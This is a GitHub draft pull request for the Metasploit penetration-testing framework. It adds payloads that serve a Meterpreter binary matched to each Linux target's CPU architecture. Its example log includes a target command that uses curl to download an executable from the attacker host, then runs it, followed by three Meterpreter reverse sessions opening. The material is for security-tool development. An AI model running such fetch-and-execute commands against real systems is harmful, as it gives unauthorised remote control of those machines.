Skip to content

Fetch Multi Part 2: The Fetchening#21384

Draft
bwatters-r7 wants to merge 2 commits intorapid7:masterfrom
bwatters-r7:feature/fetch-multi-3
Draft

Fetch Multi Part 2: The Fetchening#21384
bwatters-r7 wants to merge 2 commits intorapid7:masterfrom
bwatters-r7:feature/fetch-multi-3

Conversation

@bwatters-r7
Copy link
Copy Markdown
Contributor

@bwatters-r7 bwatters-r7 commented Apr 27, 2026
edited
Loading

This is another shot at the fetch multi payloads that will automagically serve the proper arch of Linux payload regardless of what architecture calls back. Per request, it uses query strings, so it is only available on http-based fetch commands. It also only works with Linux right now, but as we do not have an AARCH64 Windows Meterpreter, that's probably fine for now.
Currently, this works, but probably a lot of the other fetch payloads are broken, so this is in draft. I also likely need to do a bit of cleanup for artifacts left over from other attempts.

Closes #21389

Example 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) > to_handler
[*] generate_fetch:150
[*] 152
[*] 154
[*] 164
[*] generate_fetch_commands
[*] 175
[*] Command to execute on target: curl -so ./MvnXpRmBOvmZ http://10.5.135.201:8080/TUvgVhj-5qUlmIMMOHXB0g?arch=$(uname -m);chmod +x ./MvnXpRmBOvmZ;./MvnXpRmBOvmZ&
[*] Payload Handler Started as Job 0
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) >
[*] setup_handler:23
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] setup_handler:26
[*] Adding resource /TUvgVhj-5qUlmIMMOHXB0g
[*] setup_handler:30
[*] Started reverse TCP handler on 10.5.135.201:4567
[*] on_request_uri:66
[*] {:arch=>"_any_", :dynamic_arch=>true}
[*] Client 10.5.134.119 requested /TUvgVhj-5qUlmIMMOHXB0g?arch=x86_64
[*] on_request_uri:74
[*] Sending payload to 10.5.134.119 (curl/8.5.0)
[*] on_request_uri:76
[*] on_request_uri:78
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] GET /TUvgVhj-5qUlmIMMOHXB0g?arch=x86_64 HTTP/1.1
Host: 10.5.135.201:8080
User-Agent: curl/8.5.0
Accept: */*


[*] x86_64
[*] Searching for x86_64
[*] Building payload for x64 arch
[*] 2
[*] generate:31
[*] generate:33
[*] Meterpreter session 1 opened (10.5.135.201:4567 -> 10.5.134.119:49592) at 2026-04-27 16:32:34 -0500
[*] on_request_uri:66
[*] {:arch=>"x64", :dynamic_arch=>true}
[*] Client 10.5.132.212 requested /TUvgVhj-5qUlmIMMOHXB0g?arch=armv7l
[*] on_request_uri:74
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] on_request_uri:76
[*] on_request_uri:78
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] GET /TUvgVhj-5qUlmIMMOHXB0g?arch=armv7l HTTP/1.1
Host: 10.5.135.201:8080
User-Agent: curl/8.13.0-rc3
Accept: */*


[*] armv7l
[*] Searching for armv7l
[*] Building payload for armle arch
[*] 2
[*] generate:31
[*] generate:33
[*] Meterpreter session 2 opened (10.5.135.201:4567 -> 10.5.132.212:34124) at 2026-04-27 16:34:41 -0500
[*] on_request_uri:66
[*] {:arch=>"armle", :dynamic_arch=>true}
[*] Client 10.5.132.215 requested /TUvgVhj-5qUlmIMMOHXB0g?arch=aarch64
[*] on_request_uri:74
[*] Sending payload to 10.5.132.215 (curl/8.11.0)
[*] on_request_uri:76
[*] on_request_uri:78
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] GET /TUvgVhj-5qUlmIMMOHXB0g?arch=aarch64 HTTP/1.1
Host: 10.5.135.201:8080
User-Agent: curl/8.11.0
Accept: */*


[*] aarch64
[*] Searching for aarch64
[*] Building payload for aarch64 arch
[*] 2
[*] generate:31
[*] generate:33
[*] Meterpreter session 3 opened (10.5.135.201:4567 -> 10.5.132.215:44022) at 2026-04-27 16:35:37 -0500

@kx7m2qd kx7m2qd mentioned this pull request May 1, 2026
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

Add Fetch Linux Multi arch Meterpreter

2 participants

@bwatters-r7 @smcintyre-r7